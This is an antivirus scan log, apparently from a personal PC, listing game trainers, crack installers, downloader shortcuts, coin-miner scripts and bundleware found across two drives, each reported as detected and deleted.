D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\The_Witcher_EE_TRAiNER-STN.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\witcher1steam.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TITAN QUEST!\Titan Quest Anniversary Edition V1.3 Trainer +8 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\AZ Yuri Hack 2.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\yuri1001.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\YuriTrainer.exe    Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\Crashlands V1.4.10.10 Trainer +1 MrAntiFun.exe    a variant of MSIL/GameHack.AIM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\ImpossibleCreatures-Plus2-Trainer.exe    a variant of Win32/GameHack.CNX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\pztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\StarWarsBattlefrontII-Plus6-Trainer.exe    a variant of Win32/GameHack.CNX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\WAR OF THE RINGS SUPP!\zzpztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\Bionic Dues V1.103 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\UNPACK II!\D&D +6\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\UNPACK II!\D&D +7\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\ZZ OLD REUSE & DELETE!\Bionic Dues V1.103 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\ZZ OLD REUSE & DELETE!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TWO!\Alien Swarm! Reactive Drops!\TRAINER!\Alien Swarm Reactive Drop V05.02.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TWO!\D. FENCE!\Defense Grid!\UNRAR!\Defese Grid The Awakening 32.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TWO!\UNRAR!\Ion Fury V FitGril Plus 4 Trainer 64.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\GGGottem!\Dragon.Ball.Xenoverse.2.v1.10.incl.DLC\Dragon.Ball.Xenoverse.2.Update.v1.09.01-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\GGGottem!\Dragon.Ball.Xenoverse.2.v1.10.incl.DLC\Dragon.Ball.Xenoverse.2.Update.v1.10.incl.DLC-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\DIVINE DIVINITY!\ORIGINAL SIN TRAIN!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\1ST FAIL\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2 (2).exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\asx-ds2_For_v2.2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\pztrain.exe    a variant of Win32/GameHack.O potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\MOUNT&BLADE!\TRAINER ORIGINAL!\Mount & Blade Trainer.exe    a variant of Win32/GameHack.F potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\REAL PERFECT GAMING!\NEVERWINTER!\UNRAR!\Neverwinter Nights +6TR\Neverwinter Nights V1.69.8109 +6TR.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\DELALL\The Battle for Middle-earth II Witch King Trainer +5.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\El Resurgir del Rey Brujo™ Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\The Battle for Middle-earth  II Witch King Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\Trainer-100.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\twk2trn.exe    a variant of Win32/GameHack.BA potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Lord of the Rings!\War of the Rings!\WAR OF THE RINGS SUPP!\zzpztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\Pillars of Eternity!\UNRAR!\Pillars of Eternity v1.0.2.0508-v3.03.1047 Plus 24 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\THE FINAL FRANCHISING!\PRAETORIANS!\RARED OUT!\FAIL\Trainer Praetorians +5 (Mod 3.0 & 4.0).exe    Win32/GameHack.AD potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Battlefleet Gothic Armada!\BMGA I TRAINERS!\Battlefleet Gothic Armada V1.8.10317 Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\2\War_40k_SM_PLUS_8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\3\WH_40K_Space_Marine_Plus_5_Trainer.exe    a variant of Win32/GameHack.JO potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\4\WH40KSM+12Tr-LinGon\WH40KSM+12Tr-LinGon.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\5\War_40k_SM_PLUS_8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\WH40KSM+12Tr-LinGon\WH40KSM+12Tr-LinGon.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

D:\GGGODEM! ~S~\WARHAMMER!\Space Marine!\UNRAR!\Warhammer 40k Space Marine V1.0.165 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\Ripp2!\A Rippers Scythe!!\New Scythe!\PageNest-Free_3.30.exe    Win32/DownWare.W potentially unwanted application    cleaned by deleting

D:\Ripp2!\TORGAMES!\Mortal Kombat Komplete Edition (2013) PC [ENG_MULTi] RePack (download torrent) - TPB_files\crypta.js    JS/CoinMiner.DO trojan    cleaned by deleting

D:\StAllIns!!\GAMES RETURNSTALL!\DEVIL MAY CRY!\DmC - Devil May Cry\Binaries\Win32\steam_api.dll    a variant of Win32/HackTool.Crack.CS potentially unsafe application    cleaned by deleting

D:\StAllIns!!\GAMES2!!\Age of Empires II HD\steam_apirajas.dll    a variant of Win32/HackTool.Crack.EN potentially unsafe application    cleaned by deleting

D:\UUUUUGH DELUPDATE!\AAAAAAAA!!\Grim.Dawn.Forgotten.Gods.Update.v1.1.5.1-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\UUUUUGH DELUPDATE!\AAAAAAAA!!\Grim.Dawn.Forgotten.Gods.Update.v1.1.5.2-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\UUUUUGH DELUPDATE!\AAAAAAAA!!\Grim.Dawn.Forgotten.Gods.Update.v1.1.6.0-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\UUUUUGH DELUPDATE!\AAAAAAAA!!\Grim.Dawn.Forgotten.Gods.Update.v1.1.6.1-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\UUUUUGH DELUPDATE!\AAAAAAAA!!\Grim.Dawn.Forgotten.Gods.Update.v1.1.7.0-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

D:\W0RN!!\LIA ULTIMATE!\Lia-Louise.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\Screens\Screens.jpg.lnk    LNK/TrojanDownloader.Agent.TO trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\Screens\Visit Us and Support.txt.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\updates 17.01.18\Lia Louise.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\updates 17.01.18\Screens.jpg.lnk    LNK/TrojanDownloader.Agent.TO trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\updates 17.01.18\Visit Us and Support.txt.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\updates 17.12.21\Screens.jpg.lnk    LNK/TrojanDownloader.Agent.TO trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\updates 17.12.21\Visit Us and Support.txt.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\Lia Louise Mega babe.avi.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\Screens.jpg.lnk    LNK/TrojanDownloader.Agent.TO trojan    cleaned by deleting

D:\W0RN!!\LIA UNPACK!\Visit Us and Support.txt.lnk    LNK/TrojanDownloader.Agent.SR trojan    cleaned by deleting

D:\WAAARR!!\PAGES!\Adobe Photoshop CC 2019 x64 (download torrent) - TPB_files\tpb.js    JS/CoinMiner.CE potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\A5 Smiley!!\AirDroid_Desktop_Client_3.4.1.0.exe    Win32/FusionCore.L potentially unwanted application,Win32/FusionCore.P potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\BASIC INSTALL KIT!\PowerISO7-x64.exe    a variant of Win32/FusionCore.Q potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\BASIC INSTALL KIT!\PowerISO7.exe    a variant of Win32/FusionCore.Q potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\BOOT!!\WinUSB!!\FileForum_installer.exe    Win32/InstallCore.Gen.A potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\BOOT!!\SetupImgBurn_2.5.8.0.exe    Win32/FusionCore.L potentially unwanted application,a variant of Win32/FusionCore.P potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\DLL!!!\ccsetup533.exe    Win32/HackedApp.CCleaner.A trojan    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\DLL!!!\ccsetup533pro.exe    Win32/HackedApp.CCleaner.A trojan    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\DLL!!!\PCFixKit_Setup.exe    a variant of Win32/PCFixKit.A potentially unwanted application    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\Passstuff\WinMend-Folder-Hidden.exe    multiple detections,Win32/SunnyDigits.D trojan,a variant of Win32/SunnyDigits.D trojan,a variant of Win32/SunnyDigits.B trojan    cleaned by deleting

D:\ZZEALED!\KITT Ens!!\Protection\zafwSetupWeb_150_653_17211.exe    a variant of Win32/FusionCore.L potentially unwanted application    deleted

D:\ZZEALED!\KITT Ens!!\System Streamline!\AIDA64 Extreme and Engineer Edition v5.90.4200 Final + Keygen\Setup.exe    Win32/Indiloadz.V trojan    cleaned by deleting

D:\ZZEALED!\QUIPAGES!\Game.of.Thrones.S08E03.1080p.WEB.H264-MEMENTO[ettv] (download torrent) - TPB_files\tpb.js    JS/CoinMiner.CE potentially unwanted application    cleaned by deleting

D:\ZZEALED!\RippEra!!\A Rippers Scythe!!\New Scythe!\PageNest-Free_3.30.exe    Win32/DownWare.W potentially unwanted application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Alien Swarm Reactive Drop V05.02.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Dragon Ball Xenoverse V1.08 Trainer +11 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Fallout 3 v1.7.0.3 + 7 Plus Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\GemCraft Chasing Shadows (+3)[v1.0.6 [Steam][Enjoy].exe    a variant of Win32/GameHack.EFQ potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Princess_Of_Persia_The_Sands_Of_Time_Trainer.exe    a variant of Win32/Packed.Themida.ACU trojan    cleaned by deleting

D:\ZZZZZZZZZZZ QUICKTRAIN!\Sacred Gold V2.28 Trainer +2 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGG It!\ALL UNIQUE TO HERE!\Monster.Train-PLAZA\Monster.Train.Update.Build.9314-PLAZA\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGG It!\ALL UNIQUE TO HERE!\Monster.Train-PLAZA\Monster.Train.Update.Build.9332-PLAZA\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGG It!\ALL UNIQUE TO HERE!\Monster.Train-PLAZA\Monster.Train.Update.Build.9390-PLAZA\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGG It!\BEAUTIFUL BRAWLING BASTARDS II!\BLAZBLUE!\BlazBlue Cross Tag Battle - Special Edition - PLAZA\Setup.exe    Win32/Indiloadz.CC trojan    cleaned by deleting

E:\ALL GG!\GGG It!\BEAUTIFUL BRAWLING BASTARDS II!\GUILTY GEAR!!\codex-guilty.gear.xrd.rev.2.update.v2.02\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGG It!\D DRAGON BALLZ!!!\Dragon.Ball.Xenoverse.2.v1.14.incl.DLC\Dragon.Ball.Xenoverse.2.Update.v1.14.incl.DLC-CODEX\Update\Setup.exe    a variant of Win32/HackTool.Crack.ES potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\BB TRIGGER\BlazBlue - Calamity Trigger v1.0.0.0 + 8 Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\BB TRIGGER\BLAZBLUE CT Act.2 DELTA10FY.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\CENTRALFICTION!\BlazBlue Centralfiction V05.05.2017 Trainer +2 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\Continuum Shift!\TS BBCSE DELTA10FY\TS_BBCSE.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\Continuum Shift!\BlazBlue Continuum Shift Extend V1.00 Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\BEAUTIFULL BRAWLING BASTARDS!\BlazBlue!\UNRAR!\BlazBlue Chronophantasma Extend V1.00 Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\BATTLEFLEET GOTHICH ARMADA!\Battlefleet Gothic Armada V1.8.10317 Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\BAYONETTA!\UNRAR!\1.0!\Bayonetta V1.0 Plus 9 Trainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\BAYONETTA!\UNRAR!\1.0!\Bayonetta v1.0-v1.01 Plus 11 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\BAYONETTA!\UNRAR!\BAYONETTA!G\Bayonetta v1.0-v1.01 Plus 11 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\COMMAND & CONQUER!\UNRAR!\KW 1.02 +5 Command and Conquer 3 Trainer -Abolfazl.k\Command & Conquer 3 Trainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\COMMAND & CONQUER!\UNRAR!\TW 1.09 +11 1c0c93tibwar-ch\C & C 3 Trainer 1.09.exe    a variant of Win32/GameHack.F potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\COMMAND & CONQUER!\UNRAR!\Command & Conquer 3 Kanes Wrath V1.0.0 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DARKSIDERS!\UNRAR!\Dark_FY\Darksiders_FY_P.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DARKSIDERS!\UNRAR!\Darksiders V01.01.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\DMC 4!\Devil May Cry 4 Special Edition v1.0 Plus 20 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\IT'S  1.1! FOR UPOINTS!\DmC+18Tr-LNG_Steam.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\IT'S 1.2! YES! IDK!\DmC+18Tr-LNG_UD1.2.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DmC+14Tr-LNG.exe    a variant of Win32/GameHack.EI potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DmC+18Tr-LNG_UD1.3.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\dmctrainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DMC_PLUS8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\1.0!! YES!\asx-p4-dmc3se.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\1.0!! YES!\trainer.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\1.10! mmno\asx-dmc3se_jpn_v1.10.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\1.20\asx-dmc3se_jpn_v1.2.0.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\1.30\asx-dmc3se_jpn_v1.3.0.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\DEVIL MAY CRY!\UNRAR DMC3!\HD 1.0!\Devil May Cry 3 HD v1.0 Plus 11 Trainer.exe    a variant of Win64/GameHack.AU potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\KILLER IS DEAD!\Killer is Dead V1.00 Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\Prototype!\Prototype + 16 Trainer - CES-LinGon\Prototype + 16 Trainer - CES-LinGon.exe    a variant of Win32/GameHack.EI potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TITAN QUEST!\UNRAR!\Titan Quest Anniversary Edition V2.1.1 Trainer +8 MrAntiFun.exe    a variant of MSIL/GameHack.AIM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\A Rebel Galaxy V1.08 Trainer +9 MrAntiFun\Rebel Galaxy V1.08 GOG Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\A Rebel Galaxy V1.08 Trainer +9 MrAntiFun\Rebel Galaxy V1.08 Steam Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL DIVINITY!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL ONGOING!\One Finger Death Punch Trainer\One Finger Death Punch Trainer.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL ONGOING!\GemCraft Chasing Shadows (+3)[v1.0.6 [Steam][Enjoy].exe    a variant of Win32/GameHack.EFQ potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\1ST FAIL\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

